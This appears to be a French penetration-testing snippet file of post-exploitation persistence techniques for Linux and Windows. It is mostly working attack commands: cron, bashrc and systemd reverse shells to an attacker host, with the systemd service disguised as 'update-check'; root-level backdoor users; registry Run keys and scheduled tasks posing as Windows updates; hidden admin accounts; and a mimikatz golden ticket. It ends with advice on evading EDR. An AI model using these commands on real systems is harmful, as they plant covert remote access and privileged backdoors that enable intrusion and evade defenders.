--- title: "Persistance" domain: security subdomain: pentest phase: 05-post-exploitation type: snippet tags: [persistence, backdoor, cron, registry, authorized-keys] difficulty: advanced status: stable updated: "2025-05-10" --- ## Linux ### Clé SSH autorisée ```bash # Générer une paire de clés côté attaquant ssh-keygen -t ed25519 -f /tmp/backdoor -N "" # Ajouter la clé publique sur la cible mkdir -p /home/{{USER}}/.ssh echo "{{SSH_PUBLIC_KEY}}" >> /home/{{USER}}/.ssh/authorized_keys chmod 600 /home/{{USER}}/.ssh/authorized_keys # Connexion persistante ssh -i /tmp/backdoor {{USER}}@{{TARGET}} ``` ### Cron job backdoor ```bash # Reverse shell toutes les 5 minutes echo "*/5 * * * * root bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1" >> /etc/crontab # Ou via crontab user (crontab -l 2>/dev/null; echo "*/5 * * * * bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'") | crontab - ``` ### Utilisateur backdoor ```bash # Créer un utilisateur root useradd -o -u 0 -g 0 -s /bin/bash -d /root {{BACKDOOR_USER}} echo "{{BACKDOOR_USER}}:{{BACKDOOR_PASS}}" | chpasswd # Ajouter à sudoers sans mot de passe echo "{{BACKDOOR_USER}} ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers ``` ### Modification /etc/passwd ```bash # Ajouter un compte root echo "{{BACKDOOR_USER}}:$(openssl passwd {{BACKDOOR_PASS}}):0:0::/root:/bin/bash" >> /etc/passwd ``` ### Bashrc / Profile ```bash # Dans ~/.bashrc ou ~/.profile echo "bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1" >> ~/.bashrc # Silencieux avec redirection echo "nohup bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1 &" >> ~/.bashrc ``` ### Service systemd ```bash cat > /etc/systemd/system/update-check.service << 'EOF' [Unit] Description=System Update Check [Service] ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1' Restart=always RestartSec=60 [Install] WantedBy=multi-user.target EOF systemctl enable update-check systemctl start update-check ``` ## Windows ### Registry Run key ```bash # HKCU (user courant) reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Temp\shell.exe" /f # HKLM (tous les utilisateurs, nécessite admin) reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Temp\shell.exe" /f ``` ### Tâche planifiée ```bash # Toutes les heures schtasks /create /tn "WindowsUpdate" /tr "C:\Temp\shell.exe" /sc hourly /ru System /f # Au démarrage schtasks /create /tn "StartupTask" /tr "C:\Temp\shell.exe" /sc onstart /ru System /f ``` ### Service Windows ```bash sc create "WindowsHelper" binpath= "C:\Temp\shell.exe" start= auto sc start "WindowsHelper" ``` ### Comptes locaux ```bash net user {{BACKDOOR_USER}} {{BACKDOOR_PASS}} /add net localgroup administrators {{BACKDOOR_USER}} /add # Cacher de l'écran de login reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v {{BACKDOOR_USER}} /t REG_DWORD /d 0 /f ``` ### Golden Ticket (Active Directory) ```bash # Dans mimikatz, dump le hash KRBTGT lsadump::dcsync /user:krbtgt # Créer le golden ticket kerberos::golden /user:Administrator /domain:{{DOMAIN}} /sid:{{DOMAIN_SID}} /krbtgt:{{KRBTGT_HASH}} /ticket:golden.kirbi # Utiliser le ticket kerberos::ptt golden.kirbi ``` Les backdoors sont détectables par les EDR modernes. Préférer des techniques Living-off-the-land (LOLBins) pour rester discret.